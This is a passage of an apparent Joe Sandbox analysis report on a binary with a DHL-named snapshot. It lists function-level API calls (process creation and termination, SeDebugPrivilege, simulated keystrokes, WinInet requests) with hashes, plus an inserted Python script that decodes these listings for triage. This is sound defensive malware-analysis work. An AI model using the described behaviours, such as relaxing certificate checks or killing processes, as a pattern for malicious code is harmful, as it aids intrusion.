                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 2603140658-3916222277
                                                                                        • Opcode ID: 42060c12efc4773c7fd0aefac61f1b640435a1355a854b193061e2912821e5aa
                                                                                        • Instruction ID: 95343ae26a1bb13a247a46ab14401c0c423a56ba968a53270911110a835920af
                                                                                        • Opcode Fuzzy Hash: 42060c12efc4773c7fd0aefac61f1b640435a1355a854b193061e2912821e5aa
                                                                                        • Instruction Fuzzy Hash: 79418EB1501218BFEB118F65CC89FBF7BACEF08354F04812AFE199A141E7749E459BA4
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C862EC
                                                                                        • GetWindowLongW.USER32(013B77E0,000000F0), ref: 00C8631F
                                                                                        • GetWindowLongW.USER32(013B77E0,000000F0), ref: 00C86354
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C86386
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C863B0
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00C863C1
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C863DB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 2178440468-2594219639
                                                                                        • Opcode ID: 22cefe975e915ce17b4ee36dd926ffbae82c8cf939de64559cafd574e79c0f74
                                                                                        • Instruction ID: 3968009fd884c2a2c8219ab2ea926a494e026bf0758ca8a746d3d2f5030c8367
                                                                                        • Opcode Fuzzy Hash: 22cefe975e915ce17b4ee36dd926ffbae82c8cf939de64559cafd574e79c0f74
                                                                                        • Instruction Fuzzy Hash: 74311230640250AFDB21DF19EC85F5937E1FB4A718F1902A8F521DF2B2CB71AD809B59
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C8F910), ref: 00C78D28
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C8F910), ref: 00C78D5C
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C78ED6
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00C78F00
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: 7b07f8fb5dd54c91b5df7603a012cdc06b53939cf0bec40c3e20499f8f744716
                                                                                        • Instruction ID: 29d076864c245e39e2e06817c4e476f75a69ec27d2e30d804198d66c730bab76
                                                                                        • Opcode Fuzzy Hash: 7b07f8fb5dd54c91b5df7603a012cdc06b53939cf0bec40c3e20499f8f744716
                                                                                        • Instruction Fuzzy Hash: E5F14B75A00209EFDF14DF94C888EAEB7B9FF49314F108458FA19AB251DB31AE46DB50
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C7F6B5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F848
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F86C
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F8AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F8CE
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7FA4A
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C7FA7C
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C7FAAB
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C7FB22
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: 8761237e7bb1949565abad0501793ecbdf543305e83623f9590bf01a5a1b8e6f
                                                                                        • Instruction ID: 02fa87967f34e209e542fcb700319c53dcd9b21146cb1d962929401815b49d76
                                                                                        • Opcode Fuzzy Hash: 8761237e7bb1949565abad0501793ecbdf543305e83623f9590bf01a5a1b8e6f
                                                                                        • Instruction Fuzzy Hash: A1E1AE712043009FC724EF24C891B6ABBE1EF85314F14C96DF8999B2A2CB30DD46EB52
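                                                                                        The WinInet record above (InternetQueryOptionW and InternetSetOptionW called with option 0000001F, HttpQueryInfoW with 00000005) and this CreateProcessW record are the two listings a triage analyst decodes first. The Python below is an added example, not part of the Joe Sandbox report or of the AutoIt runtime the head of the report says this binary embeds: it parses lines in the report's "APIs" format, decodes the constants from the Windows SDK headers (INTERNET_OPTION_SECURITY_FLAGS = 0x1F, SECURITY_FLAG_IGNORE_UNKNOWN_CA = 0x100, HTTP_QUERY_CONTENT_LENGTH = 5) and emits findings. The sample lines are copied from the two records; reading the third InternetSetOptionW argument (00000100) as the flag value rather than as the lpBuffer pointer is an assumption about how the listing renders that argument, and every finding string is the example's own wording.

```python
"""Decode the per-function "APIs" listings of a Joe Sandbox report.

Added example, not part of the report.  SAMPLE is constructed from the
WinInet and CreateProcessW records above; constant names and values are
taken from the Windows SDK headers (wininet.h).
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: API lines copied from two function records of the report.
SAMPLE = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C71A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C71A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C71ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C71AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C71AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C71B10
• InternetCloseHandle.WININET(00000000), ref: 00C71B57
  • Part of subcall function 00C72483: GetLastError.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C72498
• _memset.LIBCMT ref: 00C7F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C7F848
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7FA4A
"""

# "• Api.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function ADDR:",
# and CRT entries such as "_memset.LIBCMT ref: ADDR" that carry no argument list.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAG_NAMES = {            # bits that relax server-certificate checking
    0x0100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x0200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
HTTP_QUERY_NAMES = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}


@dataclass
class Call:
    api: str
    module: str
    args: list              # int for a value the report resolved, None for '?'
    ref: int                # call-site address
    subcall: Optional[int]  # callee address when the line is "Part of subcall function"


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)


def parse_api_lines(text: str) -> list:
    """Turn one record's API lines into Call objects; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [_parse_arg(t) for t in raw.split(",")]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def api_sequence(text: str) -> list:
    """Ordered API names of the function itself (subcall lines excluded)."""
    return [c.api for c in parse_api_lines(text) if c.subcall is None]


def decode_security_flags(value: int) -> list:
    """Split an INTERNET_OPTION_SECURITY_FLAGS value into its named bits, lowest bit first."""
    return [name for bit, name in sorted(SECURITY_FLAG_NAMES.items()) if value & bit]


def triage(text: str) -> list:
    findings = []
    direct = [c for c in parse_api_lines(text) if c.subcall is None]
    for c in direct:
        if c.api == "InternetSetOptionW" and len(c.args) >= 3 and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS:
            # lpBuffer is a pointer to a DWORD; the report lists 00000100 in that slot and this
            # example assumes the listing shows the buffer's value rather than its address.
            names = decode_security_flags(c.args[2] or 0)
            if names:
                findings.append(f"InternetSetOptionW @ {c.ref:08X}: INTERNET_OPTION_SECURITY_FLAGS |= "
                                f"{' | '.join(names)} (HTTPS requests made here tolerate an untrusted chain)")
        elif c.api == "HttpQueryInfoW" and len(c.args) >= 2 and c.args[1] in HTTP_QUERY_NAMES:
            findings.append(f"HttpQueryInfoW @ {c.ref:08X}: reads {HTTP_QUERY_NAMES[c.args[1]]}")
        elif c.api == "CreateProcessW":
            findings.append(f"CreateProcessW @ {c.ref:08X}: command line is '?' (not static); take it from the dynamic trace")
    seq = [c.api for c in direct]
    if "GetSystemDirectoryW" in seq and "CreateProcessW" in seq \
            and seq.index("GetSystemDirectoryW") < seq.index("CreateProcessW"):
        findings.append("GetSystemDirectoryW precedes CreateProcessW: check whether the image path is built from the system directory")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

                                                                                        Run it as a script to print the findings for the embedded lines, or feed it the API lines of any other record on this page; new (API, argument) decoders go into the two constant tables.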
                                                                                        APIs
                                                                                          • Part of subcall function 00C6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C63697,?), ref: 00C6468B
                                                                                          • Part of subcall function 00C6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C63697,?), ref: 00C646A4
                                                                                          • Part of subcall function 00C64A31: GetFileAttributesW.KERNEL32(?,00C6370B), ref: 00C64A32
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00C64D40
                                                                                        • _wcscmp.LIBCMT ref: 00C64D5A
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00C64D75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: 5fc2a2f7918c0c8a3526f82e7cd9e4f1e7e723b361854be52e4ce1fe55a6b23f
                                                                                        • Instruction ID: 06c934822237917d427b8bf76de3e93587c529043936fbb420022b3348e628ab
                                                                                        • Opcode Fuzzy Hash: 5fc2a2f7918c0c8a3526f82e7cd9e4f1e7e723b361854be52e4ce1fe55a6b23f
                                                                                        • Instruction Fuzzy Hash: 465164B24083859BC735EBA0D8819DFB3ECAF85350F00092EF689D3151EF75A689D766
                                                                                        APIs
                                                                                          • Part of subcall function 00C5A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C5A84C
                                                                                          • Part of subcall function 00C5A82C: GetCurrentThreadId.KERNEL32 ref: 00C5A853
                                                                                          • Part of subcall function 00C5A82C: AttachThreadInput.USER32(00000000,?,00C59683,?,00000001), ref: 00C5A85A
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C5968E
                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C596AB
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C596AE
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C596B7
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C596D5
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C596D8
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C596E1
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C596F8
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C596FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: ed31eb118b4d2bcf65c96880f22431774f51be27b82023dec7576a0b5c677481
                                                                                        • Instruction ID: 9c073c01e2b829550620ee7ba7d59f95e1b4fc951b657d2e31b0e76bd21a357f
                                                                                        • Opcode Fuzzy Hash: ed31eb118b4d2bcf65c96880f22431774f51be27b82023dec7576a0b5c677481
                                                                                        • Instruction Fuzzy Hash: BF11E1B1A10218BEF6106F61DC89F6E3B2DEB4C751F100529F644AB0E0C9F26C51DBA8
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C5853C,00000B00,?,?), ref: 00C5892A
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00C5853C,00000B00,?,?), ref: 00C58931
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C5853C,00000B00,?,?), ref: 00C58946
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00C5853C,00000B00,?,?), ref: 00C5894E
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00C5853C,00000B00,?,?), ref: 00C58951
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C5853C,00000B00,?,?), ref: 00C58961
                                                                                        • GetCurrentProcess.KERNEL32(00C5853C,00000000,?,00C5853C,00000B00,?,?), ref: 00C58969
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00C5853C,00000B00,?,?), ref: 00C5896C
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00C58992,00000000,00000000,00000000), ref: 00C58986
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: 9cd3f7478118bcf220f748ffa18691b8aa286734f9ab8ff16f01b434bd002e8d
                                                                                        • Instruction ID: 1ba36da6bc2870101aa9c3779de65e7a8e90397d66d7d7d8d090c1633b395af0
                                                                                        • Opcode Fuzzy Hash: 9cd3f7478118bcf220f748ffa18691b8aa286734f9ab8ff16f01b434bd002e8d
                                                                                        • Instruction Fuzzy Hash: 2201A4B5240308FFE610ABA5DC8DF6F7BACEB89711F408425FA05DB2A1CA749C158B24
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: 1e26b6e5886e6c303c77327dae1e89bea841c6f67b637106d7976c5e092b21d5
                                                                                        • Instruction ID: 56ea9e55c5d8b6f8fb47f3570799756a15e86a7badf41384d2110886cbbda376
                                                                                        • Opcode Fuzzy Hash: 1e26b6e5886e6c303c77327dae1e89bea841c6f67b637106d7976c5e092b21d5
                                                                                        • Instruction Fuzzy Hash: 72C1A371A002199FDF10DF99D885BAEB7F5FF48314F14C469E919AB280E7709E45CB90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                        • API String ID: 2862541840-625585964
                                                                                        • Opcode ID: c9472b289916a23413c68cbd2b6dacf24b848e2cbdb3ab150ad6dad09eeda195
                                                                                        • Instruction ID: 007fa1d6cb64fdb6d7fb02ffec419731263c100a21f59b85b4e5fee4718a29c5
                                                                                        • Opcode Fuzzy Hash: c9472b289916a23413c68cbd2b6dacf24b848e2cbdb3ab150ad6dad09eeda195
                                                                                        • Instruction Fuzzy Hash: 3A91AD71A00219ABDF24DFA5C848FAEBBB8EF85710F10C159F519AB291D7709A45CFA0
                                                                                        APIs
                                                                                          • Part of subcall function 00C5710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?,?,00C57455), ref: 00C57127
                                                                                          • Part of subcall function 00C5710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C57142
                                                                                          • Part of subcall function 00C5710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?,?), ref: 00C57150
                                                                                          • Part of subcall function 00C5710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C57044,80070057,?), ref: 00C57160
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C79806
                                                                                        • _memset.LIBCMT ref: 00C79813
                                                                                        • _memset.LIBCMT ref: 00C79956
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C79982
                                                                                        • CoTaskMemFree.OLE32(?), ref: 00C7998D
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 00C799DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: a594f1f9d330a567438be18561080807d4de7f73082d320f2e85d8fc39f3eb29
                                                                                        • Instruction ID: b3b70dfbd3205e911f78e3d313c0d81e89af16ac9984df76d653872cc3464682
                                                                                        • Opcode Fuzzy Hash: a594f1f9d330a567438be18561080807d4de7f73082d320f2e85d8fc39f3eb29
                                                                                        • Instruction Fuzzy Hash: 2B913971D00228EBDB10DFA5DC85EDEBBB9EF09310F108169F519A7291EB719A44DFA0
                                                                                        APIs
                                                                                          • Part of subcall function 00C63C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C63C7A
                                                                                          • Part of subcall function 00C63C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C63C88
                                                                                          • Part of subcall function 00C63C55: CloseHandle.KERNEL32(00000000), ref: 00C63D52
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7E9A4
                                                                                        • GetLastError.KERNEL32 ref: 00C7E9B7
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C7E9E6
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C7EA63
                                                                                        • GetLastError.KERNEL32(00000000), ref: 00C7EA6E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C7EAA3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        • Opcode ID: b266ace6e249d3a8d1b5d788d7154fde20ddc349efe2f880cb8094cad8f89997
                                                                                        • Instruction ID: 67188d2e23a091aee5df8d3b93110c2f53a3c49379bb5676f7805f0f60bb1285
                                                                                        • Opcode Fuzzy Hash: b266ace6e249d3a8d1b5d788d7154fde20ddc349efe2f880cb8094cad8f89997
                                                                                        • Instruction Fuzzy Hash: 4641BD722002009FDB10EF24CC95F6EBBA5AF54324F04C45CF9469B3D2DB70A949EB95
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00CC57B0,00000000,013B77E0,?,?,00CC57B0,?,00C8B5A8,?,?), ref: 00C8B712
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00C8B736
                                                                                        • ShowWindow.USER32(00CC57B0,00000000,013B77E0,?,?,00CC57B0,?,00C8B5A8,?,?), ref: 00C8B796
                                                                                        • ShowWindow.USER32(00000000,00000004,?,00C8B5A8,?,?), ref: 00C8B7A8
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00C8B7CC
                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C8B7EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
